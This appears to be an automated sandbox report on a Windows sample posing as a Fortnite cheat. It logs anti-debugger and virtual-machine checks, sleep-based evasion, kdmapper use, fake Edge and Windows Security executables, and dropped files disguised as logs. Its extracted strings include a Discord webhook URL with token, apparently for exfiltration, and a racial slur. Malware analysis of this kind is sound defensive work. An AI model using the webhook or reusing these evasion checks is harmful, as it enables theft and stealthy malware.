                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: 4tXm5yPtiy.exeBinary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- |##COMBO_%02D*UNKNOWN ITEM*%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
                                Source: 4tXm5yPtiy.exeBinary or memory string: OLLYDBG.EXE
                                Source: 4tXm5yPtiy.exeBinary or memory string: X64DBG.EXE
                                Source: 4tXm5yPtiy.exeBinary or memory string: WINDBG.EXE
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 1B0B0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: EC0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1AC00000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1540000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 2380000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1A5D0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 3140000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B2E0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 21C0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1A320000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: CB0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1A850000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: B40000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1A5E0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 17D0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B4A0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1000000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1110000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9362
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9382
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\eGTFsMJp.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\UXzpIjDH.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\rWRTdVVu.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\VPYFfuwr.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\WpXNITDI.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\JlazcluE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\wDtsBZWh.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\NKJXVMBv.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\XmyVeTRC.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\TUtPMNAm.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\uIZJMPyD.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\zrKsasrd.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\VltWWbmg.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\NhvHKDkY.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\fZXNGngO.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\EVLpKOHn.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\iacMOeMk.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeDropped PE file which has not been started: C:\Users\user\Desktop\MQUzRRxE.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\DqsZwsEl.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\GfhqKgmo.logJump to dropped file
                                Source: C:\Windows\Speech\kdmapper.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_5-23587
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-20242
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeAPI coverage: 5.3 %
                                Source: C:\Windows\Speech\physmeme.exe TID: 5056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3532Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Edge\msedge.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 3564Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 4824Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 3324Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep count: 9362 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404Thread sleep count: 9382 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 5572Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 564Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 2772Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 6056Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 4536Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 3920Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 5096Thread sleep time: -30000s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 4496Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 6260Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 6528Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CBAFC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF68B4CBAFC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_0015A69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_0016C220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0017B348 FindFirstFileExA,5_2_0017B348
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016E6A3 VirtualQuery,GetSystemInfo,5_2_0016E6A3
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001AF90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                                Source: kdmapper.exe, 00000005.00000003.1495405689.0000000002D71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X5
                                Source: msedge.exe, 00000030.00000002.2070910360.000000001354A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B04B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: wscript.exe, 00000008.00000002.1650409221.00000000032BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\edputil.dllECVMWar&Prod_VMware_SATA_CD00#4&224f42ef
                                Source: msedge.exe, 00000030.00000002.2113348313.000000001BE60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.2336203508.000000001B3E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                                Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: msedge.exe, 0000000F.00000002.1719657476.000000001C127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
                                Source: w32tm.exe, 00000026.00000002.1748819692.000002830A690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                                Source: w32tm.exe, 0000003C.00000002.2076324927.00000165E52A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B05E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: curl.exe, 00000007.00000003.1503680712.000001FB23F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
